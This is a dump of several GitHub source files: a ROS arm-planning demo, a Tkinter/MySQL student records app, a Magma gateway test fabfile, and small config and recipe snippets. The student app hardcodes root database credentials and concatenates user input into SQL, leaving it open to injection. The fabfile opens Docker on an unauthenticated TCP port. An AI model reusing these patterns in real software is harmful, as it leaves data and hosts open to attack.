and attempts < maxtries:\n (plan, fraction) = self.arm.compute_cartesian_path (\n waypoints, # waypoint poses,路点列表\n 0.01, # eef_step,终端步进值\n 0.0, # jump_threshold,跳跃阈值\n True) # avoid_collisions,避障规划\n \n # 尝试次数累加\n attempts += 1\n \n # 打印运动规划进程\n if attempts % 10 == 0:\n rospy.loginfo(\"Still trying after \" + str(attempts) + \" attempts...\")\n \n # 如果路径规划成功(覆盖率100%),则开始控制机械臂运动\n if fraction == 1.0:\n rospy.loginfo(\"Path computed successfully. Moving the arm.\")\n self.arm.execute(plan)\n rospy.loginfo(\"Path execution complete.\")\n # 如果路径规划失败,则打印失败信息\n else:\n rospy.loginfo(\"Path planning failed with only \" + str(fraction) + \" success after \" + str(maxtries) + \" attempts.\") \n\n rospy.sleep(1)\n\nif __name__ == \"__main__\":\n try:\n MoveItCartesianDemo()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Joyyy821/warehouse-manipulation","sub_path":"src/interbotix_demos/src/moveit_cartesian_demo.py","file_name":"moveit_cartesian_demo.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13935373795","text":"import tkinter as Tk\nfrom tkinter import Button, Entry, Frame, Label, Scrollbar, StringVar, font\nfrom tkinter.constants import BOTH, BOTTOM, CHECKBUTTON, END, GROOVE, HORIZONTAL, RIDGE, RIGHT, SUNKEN, TOP, VERTICAL, X\nfrom typing import Text\nfrom tkinter import ttk\nfrom tkinter import Text\nimport mysql.connector\nimport requests\nfrom tkinter import messagebox\n\n\nclass Student:\n def __init__(self,root):\n self.root=root\n self.root.title(\"Student Managment System\") #Name of the database or title of database\n self.root.geometry(\"1350x700+0+0\") #Size of the sheet\n\n\n '''------------------------ All variables -----------------------------------------------'''\n self.Roll_no_var=StringVar()\n self.Name_var=StringVar()\n self.email_var=StringVar()\n self.gender_var=StringVar()\n self.contact_var=StringVar()\n self.dob_var=StringVar()\n self.Address_var=StringVar()\n self.search_by=StringVar()\n self.search_txt=StringVar()\n \n \n #After created a page \n title=Tk.Label(self.root,text=\"Student Managment System\",bd=10,relief=GROOVE,font=(\"times new roman\",30,\"bold\"),bg=\"DeepSky blue\")\n title.pack(side=TOP,fill=X) #fill=X means the length will be extended end to end in page\n\n #the two frames that we have created in left most part and right most part\n\n '''------------Manage_Frame---------------'''\n Manage_Frame=Frame(self.root,bd=4,relief=RIDGE,bg=\"lightblue\")\n Manage_Frame.place(x=20,y=70,width=350,height=560)\n m_title=Label(Manage_Frame,text=\"Manage Student\",bd=5,relief=SUNKEN,font=(\"times new roman\",20,\"bold\"),bg=\"DeepSky blue3\",fg=\"white\")\n m_title.grid(row=0,columnspan=2,pady=20)\n\n '''--------------------For label of Roll number----------------------------------'''\n lbl_roll=Label(Manage_Frame,text=\"Roll Number\",font=(\"times new roman\",10,\"bold\"))\n lbl_roll.grid(row=1,column=0,pady=10,padx=20,sticky=\"w\")\n\n\n '''--------------------For text Entry of Roll number----------------------------------'''\n txt_Roll=Entry(Manage_Frame,textvariable=self.Roll_no_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Roll.grid(row=1,column=1,padx=20,pady=10)\n\n '''--------------------For label of name----------------------------------'''\n lbl_name=Label(Manage_Frame,text=\"Name\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_name.grid(row=2,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of name-------------------------------------------'''\n txt_Name=Entry(Manage_Frame,textvariable=self.Name_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Name.grid(row=2,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of Email----------------------------------'''\n lbl_email=Label(Manage_Frame,text=\"Email-id\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_email.grid(row=3,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of email-------------------------------------------'''\n txt_email=Entry(Manage_Frame,textvariable=self.email_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_email.grid(row=3,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of Gender----------------------------------'''\n lbl_Gender=Label(Manage_Frame,text=\"Gender\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_Gender.grid(row=4,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For selecting Entry of Gender-------------------------------------------'''\n ccmbo_gender=ttk.Combobox(Manage_Frame,textvariable=self.gender_var,font=(\"times new roman\",10,\"bold\"),state=\"readonly\")\n ccmbo_gender['values']=(\"Male\",\"Female\",\"Other\")\n ccmbo_gender.grid(row=4,column=1,padx=20,pady=10)\n\n '''--------------------For label of Contact----------------------------------'''\n lbl_contact=Label(Manage_Frame,text=\"Contact\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_contact.grid(row=5,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of Contact-------------------------------------------'''\n txt_contact=Entry(Manage_Frame,textvariable=self.contact_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_contact.grid(row=5,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of DOB----------------------------------'''\n lbl_name=Label(Manage_Frame,text=\"DOB\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_name.grid(row=6,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of DOB-------------------------------------------'''\n txt_Name=Entry(Manage_Frame,textvariable=self.dob_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Name.grid(row=6,column=1,padx=20,pady=10)\n\n '''--------------------For label of Adderess----------------------------------'''\n lbl_address=Label(Manage_Frame,text=\"Address\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_address.grid(row=7,column=0,pady=10,padx=20,sticky=\"w\")\n\n \n '''--------------------For Entrying of Address-------------------------------------------'''\n self.txt_Address=Text(Manage_Frame,width=25,height=4,font=(\"\",10))\n self.txt_Address.grid(row=7,column=1,padx=20,pady=10,sticky=\"w\")\n\n\n #---------------------------------BUTTON-------------------------------------------\n btn_Frame=Frame(Manage_Frame,bd=4,relief=RIDGE,bg=\"lightblue\")\n btn_Frame.place(x=10,y=480,width=320,height=50)\n\n Add_button=Button(btn_Frame,text=\"Add\",width=5,command=self.add_students).grid(row=0,column=0,padx=15,pady=10)\n Update_button=Button(btn_Frame,text=\"Update\",width=5,command=self.update_data).grid(row=0,column=1,padx=15,pady=10)\n Delete_button=Button(btn_Frame,text=\"Delete\",width=5,command=self.delete_data).grid(row=0,column=2,padx=15,pady=10)\n clear_button=Button(btn_Frame,text=\"Clear\",width=5,command=self.clear).grid(row=0,column=3,padx=15,pady=10)\n\n\n '''------------------------------------Detail Frame------------------------------------'''\n\n Detail_Frame=Frame(self.root,bd=4,relief=RIDGE,bg=\"lightblue\")\n Detail_Frame.place(x=500,y=70,width=750,height=560)\n\n lbl_search=Label(Detail_Frame,text=\"Search By\",font=(\"times new roman\",20,\"bold\"),bd=5)\n lbl_search.grid(row=0,column=0,pady=10,padx=20,sticky=\"w\")\n\n combo_search=ttk.Combobox(Detail_Frame,textvariable=self.search_by,width=10,font=(\"times new roman\",10,\"bold\"),state='readonly')\n combo_search['values']=(\"Roll_No\",\"Name\",\"Contact\")\n combo_search.grid(row=0,column=1,padx=10,pady=10)\n\n txt_search=Entry(Detail_Frame,textvariable=self.search_txt,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_search.grid(row=0,column=2,padx=20,pady=10,sticky=\"w\")\n\n search_btn=Button(Detail_Frame,command=self.search_data,text=\"Search\",width=10).grid(row=0,column=3,padx=10,pady=10)\n showall_btn=Button(Detail_Frame,command=self.fetch_data,text=\"Show All\",width=10).grid(row=0,column=4,padx=10,pady=10)\n\n Tabel_Frame=Frame(Detail_Frame,bd=4,relief=RIDGE,bg=\"lightblue\")\n Tabel_Frame.place(x=20,y=70,width=700,height=470)\n\n scroll_x=Scrollbar(Tabel_Frame,orient=HORIZONTAL)\n scroll_y=Scrollbar(Tabel_Frame,orient=VERTICAL)\n \n self.Student_table=ttk.Treeview(Tabel_Frame,columns=(\"Roll\",\"Name\",\"Email\",\"Gender\",\"Contact\",\"DOB\",\"Address\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\n scroll_x.pack(side=BOTTOM,fill=X)\n scroll_y.pack(side=RIGHT,fill=X)\n scroll_x.config(command=self.Student_table.xview)\n scroll_y.config(command=self.Student_table.yview)\n self.Student_table.heading(\"Roll\",text=\"Roll NO\")\n self.Student_table.heading(\"Name\",text=\"Name\")\n self.Student_table.heading(\"Email\",text=\"Email-id\")\n self.Student_table.heading(\"Gender\",text=\"Gender\")\n self.Student_table.heading(\"Contact\",text=\"Contact No\")\n self.Student_table.heading(\"DOB\",text=\"DOB\")\n self.Student_table.heading(\"Address\",text=\"Address\")\n self.Student_table['show']=\"headings\"\n self.Student_table.column(\"Roll\",width=100)\n self.Student_table.column(\"Name\",width=100)\n self.Student_table.column(\"Email\",width=100)\n self.Student_table.column(\"Gender\",width=100)\n self.Student_table.column(\"Contact\",width=100)\n self.Student_table.column(\"DOB\",width=100)\n self.Student_table.column(\"Address\",width=150)\n self.Student_table.pack(fill=BOTH,expand=1)\n self.Student_table.bind(\"<ButtonRelease-1>\",self.get_cursor)\n self.fetch_data()\n\n\n def add_students(self):\n if self.Roll_no_var.get()==\"\" or self.Name_var.get()==\"\" or self.email_var.get()==\"\":\n messagebox.showerror(\"Error Occured\",\"All fields are required\")\n else: \n #host will define where our host is available database means database name\n con=mysql.connector.connect(host=\"localhost\" ,user=\"root\" ,passwd=\"1234\" ,database=\"stm\" ,auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"insert into students values(%s,%s,%s,%s,%s,%s,%s)\",(self.Roll_no_var.get(),\n self.Name_var.get(), \n self.email_var.get(),\n self.gender_var.get(),\n self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get('1.0',END)\n )) \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n messagebox.showinfo(\"Successfully \",\"Record has been inserted\")\n \n \n def fetch_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"select * from students\")\n rows=cur.fetchall()\n if len(rows)!=0:\n #deleting data from the table\n self.Student_table.delete(*self.Student_table.get_children())\n for row in rows:\n self.Student_table.insert('',END,values=row)\n con.commit()\n con.close()\n \n def clear(self):\n self.Roll_no_var.set(\"\")\n self.Name_var.set(\"\")\n self.email_var.set(\"\")\n self.gender_var.set(\"\")\n self.contact_var.set(\"\")\n self.dob_var.set(\"\")\n self.txt_Address.delete(\"1.0\",END)\n\n\n #to get data when clicked on particular value\n def get_cursor(self,ev):\n cursor_row = self.Student_table.focus()\n contents=self.Student_table.item(cursor_row)\n row = contents['values']\n self.Roll_no_var.set(row[0])\n self.Name_var.set(row[1])\n self.email_var.set(row[2])\n self.gender_var.set(row[3])\n self.contact_var.set(row[4])\n self.dob_var.set(row[5])\n self.txt_Address.delete(\"1.0\",END)\n self.txt_Address.insert(END,row[6])\n\n def update_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"update students set name=%s,email=%s,gender=%s,contact=%s,dob=%s,address=%s where roll_no=%s\",(\n self.Name_var.get(), \n self.email_var.get(),\n self.gender_var.get(),\n self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get('1.0',END),\n self.Roll_no_var.get()\n )) \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n\n def delete_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n print(self)\n cur.execute(\"DELETE FROM students WHERE roll_no=\" + (self.Roll_no_var.get()))\n con.commit()\n self.fetch_data()\n self.clear()\n con.close() \n \n def search_data(self):\n if self.search_by.get()==\"\":\n messagebox.showerror(\"Error\",\"Please write something\")\n \n else:\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"select * from students where \"+ self.search_by.get() +\" LIKE '%\"+ self.search_txt.get() +\"'\") \n rows = cur.fetchall()\n print(rows)\n if len(rows)!=0:\n self.Student_table.delete(*self.Student_table.get_children())\n for row in rows:\n self.Student_table.insert('',END,values=row)\n con.commit()\n con.close()\n \n \n \n\nroot = Tk.Tk()\nob=Student(root)\nroot.mainloop() \n","repo_name":"Kaushikj14/Student_Data_Management","sub_path":"studentLibMan.py","file_name":"studentLibMan.py","file_ext":"py","file_size_in_byte":14051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6407707380","text":"from enum import Enum\n\nimport sys\nfrom fabric.api import (cd, env, execute, lcd, local, put, run, settings,\n sudo, shell_env)\nfrom fabric.contrib import files\nsys.path.append('../../orc8r')\n\nfrom tools.fab.hosts import ansible_setup, vagrant_setup\n\nCWAG_ROOT = \"$MAGMA_ROOT/cwf/gateway\"\nCWAG_INTEG_ROOT = \"$MAGMA_ROOT/cwf/gateway/integ_tests\"\nLTE_AGW_ROOT = \"../../lte/gateway\"\n\nCWAG_IP = \"192.168.70.101\"\nCWAG_TEST_IP = \"192.168.128.2\"\nTRF_SERVER_IP = \"192.168.129.42\"\nTRF_SERVER_SUBNET = \"192.168.129.0\"\nCWAG_BR_NAME = \"cwag_br0\"\nCWAG_TEST_BR_NAME = \"cwag_test_br0\"\n\n\nclass SubTests(Enum):\n ALL = \"all\"\n AUTH = \"authenticate\"\n GX = \"gx\"\n GY = \"gy\"\n QOS = \"qos\"\n MULTISESSIONPROXY = \"multi_session_proxy\"\n\n @staticmethod\n def list():\n return list(map(lambda t: t.value, SubTests))\n\n\ndef integ_test(gateway_host=None, test_host=None, trf_host=None,\n transfer_images=False, destroy_vm=False, no_build=False,\n tests_to_run=\"all\", skip_unit_tests=False, test_re=None,\n run_tests=True):\n \"\"\"\n Run the integration tests. This defaults to running on local vagrant\n machines, but can also be pointed to an arbitrary host (e.g. amazon) by\n passing \"address:port\" as arguments\n\n gateway_host: The ssh address string of the machine to run the gateway\n services on. Formatted as \"host:port\". If not specified, defaults to\n the `cwag` vagrant box.\n\n test_host: The ssh address string of the machine to run the tests on\n on. Formatted as \"host:port\". If not specified, defaults to the\n `cwag_test` vagrant box.\n\n trf_host: The ssh address string of the machine to run the tests on\n on. Formatted as \"host:port\". If not specified, defaults to the\n `magma_trfserver` vagrant box.\n\n no_build: When set to true, this script will NOT rebuild all docker images.\n \"\"\"\n try:\n tests_to_run = SubTests(tests_to_run)\n except ValueError:\n print(\"{} is not a valid value. We support {}\".format(\n tests_to_run, SubTests.list()))\n return\n\n # Setup the gateway: use the provided gateway if given, else default to the\n # vagrant machine\n _switch_to_vm(gateway_host, \"cwag\", \"cwag_dev.yml\", destroy_vm)\n\n # We will direct coredumps to be placed in this directory\n # Clean up before every run\n if files.exists(\"/var/opt/magma/cores/\"):\n run(\"sudo rm /var/opt/magma/cores/*\", warn_only=True)\n else:\n run(\"sudo mkdir -p /var/opt/magma/cores\", warn_only=True)\n\n if not skip_unit_tests:\n execute(_run_unit_tests)\n\n execute(_set_cwag_configs, \"gateway.mconfig\")\n execute(_add_networkhost_docker)\n cwag_host_to_mac = execute(_get_br_mac, CWAG_BR_NAME)\n host = env.hosts[0]\n cwag_br_mac = cwag_host_to_mac[host]\n\n # Transfer built images from local machine to CWAG host\n if gateway_host or transfer_images:\n execute(_transfer_docker_images)\n else:\n execute(_stop_gateway)\n if not no_build:\n execute(_build_gateway)\n\n execute(_run_gateway)\n # Stop not necessary services for this test case\n execute(_stop_docker_services, [\"pcrf2\", \"ocs2\"])\n\n # Setup the trfserver: use the provided trfserver if given, else default to\n # the vagrant machine\n with lcd(LTE_AGW_ROOT):\n _switch_to_vm(gateway_host, \"magma_trfserver\",\n \"magma_trfserver.yml\", destroy_vm)\n\n execute(_start_trfserver)\n\n # Run the tests: use the provided test machine if given, else default to\n # the vagrant machine\n _switch_to_vm(gateway_host, \"cwag_test\", \"cwag_test.yml\", destroy_vm)\n\n cwag_test_host_to_mac = execute(_get_br_mac, CWAG_TEST_BR_NAME)\n host = env.hosts[0]\n cwag_test_br_mac = cwag_test_host_to_mac[host]\n execute(_set_cwag_test_configs)\n execute(_start_ipfix_controller)\n\n # Get back to the gateway vm to setup static arp\n _switch_to_vm_no_destroy(gateway_host, \"cwag\", \"cwag_dev.yml\")\n execute(_set_cwag_networking, cwag_test_br_mac)\n execute(_check_docker_services)\n\n _switch_to_vm_no_destroy(gateway_host, \"cwag_test\", \"cwag_test.yml\")\n execute(_start_ue_simulator)\n execute(_set_cwag_test_networking, cwag_br_mac)\n\n if run_tests == \"False\":\n execute(_add_docker_host_remote_network_envvar)\n print(\"run_test was set to false. Test will not be run\\n\"\n \"You can now run the tests manually from cwag_test\")\n sys.exit(0)\n\n if tests_to_run.value not in SubTests.MULTISESSIONPROXY.value:\n execute(_run_integ_tests, test_host, trf_host, tests_to_run, test_re)\n\n # Setup environment for multi service proxy if required\n if tests_to_run.value in (SubTests.ALL.value,\n SubTests.MULTISESSIONPROXY.value):\n _switch_to_vm_no_destroy(gateway_host, \"cwag\", \"cwag_dev.yml\")\n\n # copy new config and restart the impacted services\n execute(_set_cwag_configs, \"gateway.mconfig.multi_session_proxy\")\n execute(_restart_docker_services, [\"session_proxy\", \"pcrf\", \"ocs\",\n \"pcrf2\", \"ocs2\", \"ingress\"])\n execute(_check_docker_services)\n\n _switch_to_vm_no_destroy(gateway_host, \"cwag_test\", \"cwag_test.yml\")\n execute(_run_integ_tests, test_host, trf_host,\n SubTests.MULTISESSIONPROXY, test_re)\n\n # If we got here means everything work well!!\n if not test_host and not trf_host:\n # Clean up only for now when running locally\n execute(_clean_up)\n print('Integration Test Passed for \"{}\"!'.format(tests_to_run.value))\n sys.exit(0)\n\n\ndef transfer_artifacts(services=\"sessiond session_proxy\", get_core_dump=False):\n \"\"\"\n Fetches service logs from Docker and optionally gets core dumps\n Args:\n services: A list of services for which services logs are requested\n get_core_dump: When set to True, it will fetch a tar of the core dumps\n \"\"\"\n services = services.strip().split(' ')\n print(\"Transferring logs for \" + str(services))\n\n # We do NOT want to destroy this VM after we just set it up...\n vagrant_setup(\"cwag\", False)\n with cd(CWAG_ROOT):\n for service in services:\n run(\"docker logs -t \" + service + \" &> \" + service + \".log\")\n # For vagrant the files should already be in CWAG_ROOT\n if get_core_dump == \"True\":\n execute(_tar_coredump)\n\n\ndef _tar_coredump():\n _switch_to_vm_no_destroy(None, \"cwag\", \"cwag_dev.yml\")\n with cd(CWAG_ROOT):\n core_dump_dir = run('ls /var/opt/magma/cores/')\n num_of_dumps = len(core_dump_dir.split())\n print(f'Found {num_of_dumps} core dumps')\n if num_of_dumps > 0:\n run(\"sudo tar -czvf coredump.tar.gz /var/opt/magma/cores/*\",\n warn_only=True)\n\n\ndef _switch_to_vm(addr, host_name, ansible_file, destroy_vm):\n if not addr:\n vagrant_setup(host_name, destroy_vm)\n else:\n ansible_setup(addr, host_name, ansible_file)\n\n\ndef _switch_to_vm_no_destroy(addr, host_name, ansible_file):\n _switch_to_vm(addr, host_name, ansible_file, False)\n\n\ndef _transfer_docker_images():\n output = local(\"docker images cwf_*\", capture=True)\n for line in output.splitlines():\n if not line.startswith('cwf'):\n continue\n line = line.rstrip(\"\\n\")\n image = line.split(\" \")[0]\n\n local(\"docker save -o /tmp/%s.tar %s\" % (image, image))\n put(\"/tmp/%s.tar\" % image, \"%s.tar\" % image)\n local(\"rm -f /tmp/%s.tar\" % image)\n\n run('docker load -i %s.tar' % image)\n\n\ndef _set_cwag_configs(configfile):\n \"\"\" Set the necessary config overrides \"\"\"\n with cd(CWAG_INTEG_ROOT):\n sudo('mkdir -p /var/opt/magma')\n sudo('mkdir -p /var/opt/magma/configs')\n sudo(\"cp {} /var/opt/magma/configs/gateway.mconfig\".format(configfile))\n\n\ndef _set_cwag_networking(mac):\n sudo('arp -s %s %s' % (CWAG_TEST_IP, mac))\n\n\ndef _get_br_mac(bridge_name):\n mac = run(\"cat /sys/class/net/%s/address\" % bridge_name)\n return mac\n\n\ndef _set_cwag_test_configs():\n \"\"\" Set the necessary test configs \"\"\"\n sudo('mkdir -p /etc/magma')\n # Create empty uesim config\n sudo('touch /etc/magma/uesim.yml')\n\n\ndef _start_ipfix_controller():\n \"\"\" Start the IPFIX collector\"\"\"\n with cd(\"$MAGMA_ROOT\"):\n sudo('mkdir -p records')\n sudo('rm -rf records/*')\n sudo('pkill ipfix_collector > /dev/null &', pty=False, warn_only=True)\n sudo('tmux new -d \\'/usr/bin/ipfix_collector -4tu -p 4740 -o /home/vagrant/magma/records\\'')\n\n\ndef _set_cwag_test_networking(mac):\n # Don't error if route already exists\n with settings(warn_only=True):\n sudo('ip route add %s/24 dev %s proto static scope link' %\n (TRF_SERVER_SUBNET, CWAG_TEST_BR_NAME))\n sudo('arp -s %s %s' % (TRF_SERVER_IP, mac))\n\n\ndef _add_networkhost_docker():\n ''' Add network host to docker engine '''\n\n local_host = \"unix:///var/run/docker.sock\"\n nw_host = \"tcp://0.0.0.0:2375\"\n tmp_daemon_json_fn = \"/tmp/daemon.json\"\n docker_cfg_dir = \"/etc/docker/\"\n\n # add daemon json file\n host_cfg = '\\'{\"hosts\": [\\\"%s\\\", \\\"%s\\\"]}\\'' % (local_host, nw_host)\n run(\"\"\"printf %s > %s\"\"\" % (host_cfg, tmp_daemon_json_fn))\n sudo(\"mv %s %s\" % (tmp_daemon_json_fn, docker_cfg_dir))\n\n # modify docker service cmd to remove hosts\n # https://docs.docker.com/config/daemon/#troubleshoot-conflicts-between-the-daemonjson-and-startup-scripts\n tmp_docker_svc_fn = \"/tmp/docker.conf\"\n svc_cmd = \"'[Service]\\nExecStart=\\nExecStart=/usr/bin/dockerd'\"\n svc_cfg_dir = \"/etc/systemd/system/docker.service.d/\"\n sudo(\"mkdir -p %s\" % svc_cfg_dir)\n run(\"printf %s > %s\" % (svc_cmd, tmp_docker_svc_fn))\n sudo(\"mv %s %s\" % (tmp_docker_svc_fn, svc_cfg_dir))\n\n # restart systemd and docker service\n sudo(\"systemctl daemon-reload\")\n sudo(\"systemctl restart docker\")\n\n\ndef _stop_gateway():\n \"\"\" Stop the gateway docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.integ-test.yml'\n ' down')\n\n\ndef _build_gateway():\n \"\"\" Builds the gateway docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.nginx.yml'\n ' -f docker-compose.integ-test.yml'\n ' build --parallel')\n\n\ndef _run_gateway():\n \"\"\" Runs the gateway's docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.integ-test.yml'\n ' up -d ')\n\n\ndef _restart_docker_services(services):\n with cd(CWAG_ROOT + \"/docker\"):\n sudo(\n \" docker-compose\"\n \" -f docker-compose.yml\"\n \" -f docker-compose.override.yml\"\n \" -f docker-compose.nginx.yml\"\n \" -f docker-compose.integ-test.yml\"\n \" restart {}\".format(\" \".join(services))\n )\n\n\ndef _stop_docker_services(services):\n with cd(CWAG_ROOT + \"/docker\"):\n sudo(\n \" docker-compose\"\n \" -f docker-compose.yml\"\n \" -f docker-compose.override.yml\"\n \" -f docker-compose.nginx.yml\"\n \" -f docker-compose.integ-test.yml\"\n \" stop {}\".format(\" \".join(services))\n )\n\n\ndef _check_docker_services():\n with cd(CWAG_ROOT + \"/docker\"):\n run(\n \" DCPS=$(docker ps --format \\\"{{.Names}}\\t{{.Status}}\\\" | grep Restarting);\"\n \" [[ -z \\\"$DCPS\\\" ]] ||\"\n \" ( echo \\\"Container restarting detected.\\\" ; echo \\\"$DCPS\\\"; exit 1 )\"\n )\n\n\ndef _start_ue_simulator():\n \"\"\" Starts the UE Sim Service \"\"\"\n with cd(CWAG_ROOT + '/services/uesim/uesim'):\n run('tmux new -d \\'go run main.go -logtostderr=true -v=10\\'')\n\n\ndef _start_trfserver():\n \"\"\" Starts the traffic gen server\"\"\"\n run('nohup iperf3 -s --json -B %s > /dev/null &' % TRF_SERVER_IP, pty=False)\n\n\ndef _run_unit_tests():\n \"\"\" Run the cwag unit tests \"\"\"\n with cd(CWAG_ROOT):\n run('make test')\n\n\ndef _add_docker_host_remote_network_envvar():\n sudo(\n \"grep -q 'DOCKER_HOST=tcp://%s:2375' /etc/environment || \"\n \"echo 'DOCKER_HOST=tcp://%s:2375' >> /etc/environment && \"\n \"echo 'DOCKER_API_VERSION=1.40' >> /etc/environment\" % (CWAG_IP, CWAG_IP))\n\n\ndef _run_integ_tests(test_host, trf_host, tests_to_run: SubTests,\n test_re=None):\n \"\"\" Run the integration tests \"\"\"\n # add docker host environment as well\n shell_env_vars = {\n \"DOCKER_HOST\" : \"tcp://%s:2375\" % CWAG_IP,\n \"DOCKER_API_VERSION\" : \"1.40\",\n }\n if test_re:\n shell_env_vars[\"TESTS\"] = test_re\n\n # QOS take a while to run. Increasing the timeout to 20m\n go_test_cmd = \"go test -v -test.short -timeout 20m\"\n go_test_cmd += \" -tags \" + tests_to_run.value\n if test_re:\n go_test_cmd += \" -run \" + test_re\n\n with cd(CWAG_INTEG_ROOT), shell_env(**shell_env_vars):\n result = run(go_test_cmd, warn_only=True)\n if result.return_code != 0:\n if not test_host and not trf_host:\n # Clean up only for now when running locally\n execute(_clean_up)\n print(\"Integration Test returned \", result.return_code)\n sys.exit(result.return_code)\n\n\ndef _clean_up():\n # already in cwag test vm at this point\n # Kill uesim service\n run('pkill go', warn_only=True)\n with lcd(LTE_AGW_ROOT):\n vagrant_setup(\"magma_trfserver\", False)\n run('pkill iperf3 > /dev/null &', pty=False, warn_only=True)\n","repo_name":"fbcode/magma_old","sub_path":"cwf/gateway/fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"22523118269","text":"# coding=utf-8\nimport logging\nimport os\n\nlogging.basicConfig(format='%(asctime)s %(name)s[%(process)d] %(filename)s %(lineno)d %(levelname)s %(message)s',\n level=logging.INFO)\nlogger = logging.getLogger('')\n\nWEATHER_CODE = {\n \"AP010001\": u\"API请求参数错误。\",\n \"AP010002\": u\"没有权限访问这个API接口。在此查看你有权访问的API接口。\",\n \"AP010003\": u\"API密钥key错误。\",\n \"AP010004\": u\"签名错误。\",\n \"AP010005\": u\"你请求的API不存在。\",\n \"AP010006\": u\"没有权限访问这个地点。\",\n \"AP010007\": u\"JSONP请求需要使用签名验证方式。\",\n \"AP010008\": u\"没有绑定域名。在此绑定域名。\",\n \"AP010009\": u\"API请求的user-agent与你设置的不一致。\",\n \"AP010010\": u\"没有这个地点。\",\n \"AP010011\": u\"无法查找到指定IP地址对应的城市。\",\n \"AP010012\": u\"你的服务已经过期。在此续费。\",\n \"AP010013\": u\"访问量余额不足。联系客服购买更多访问量。\",\n \"AP010014\": u\"免费用户超过了每小时访问量额度。一小时后自动恢复。\",\n \"AP010015\": u\"暂不支持该城市的车辆限行信息。\",\n \"AP100001\": u\"系统内部错误:数据缺失。\",\n \"AP100002\": u\"系统内部错误:数据错误。\",\n \"AP100003\": u\"系统内部错误:服务内部错误。\"\n}\nWEATHER_DESC = {\n 'travel': u'旅游',\n 'uv': u'紫外线',\n 'car_washing': u'洗车',\n 'dressing': u'穿衣',\n 'sport': u'运动',\n}\n\nBAIDU_KEY = os.getenv('BAIDU_KEY')\nBAIDU_S_KEY = os.getenv('BAIDU_S_KEY')\nWEATHER_KEY = os.getenv('WEATHER_KEY')\n\nWEATHER_VOICE_FILE_PATH = '.'\nVOICE_SPEED = 3\nVOICE_VOL = 15\n","repo_name":"liuhuizdh/RaspberryPiKits","sub_path":"rpi/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43969818371","text":"from recipe import Recipe\n\nclass Book:\n\t\"\"\"\n\tBouquin qui receuille toutes les recettes\n\t\"\"\"\n\t\n\tnb_recette = 0 #attribut de classe\n\tlst = []\n\tdef __init__(self):\n\t\tpass\n\n\tdef add_recipe(self, nom):\n\t\tBook.lst.append(nom)\n\t\tnom = Recipe()\n\t\telem = input(\"Merci de renseigner : Niveau de 1 - 5\\Tps de prepa\\Type de repas?\\n\")\n\t\telem = elem.split()\n\t\tnom.name = nom\n\t\tnom.add_elem(elem[0], elem[1], elem[2])\n\t\tBook.nb_recette += 1\n\n\tdef print_all_recipe(self):\n\t\tfor recipe in Book.lst:\n\t\t\tprint (recipe)\n\n\tdef print_one_recipe(self, choix):\n\t\tfor recipe in Book.lst:\n\t\t\tif choix == recipe:\n\t\t\t\t#recipe = 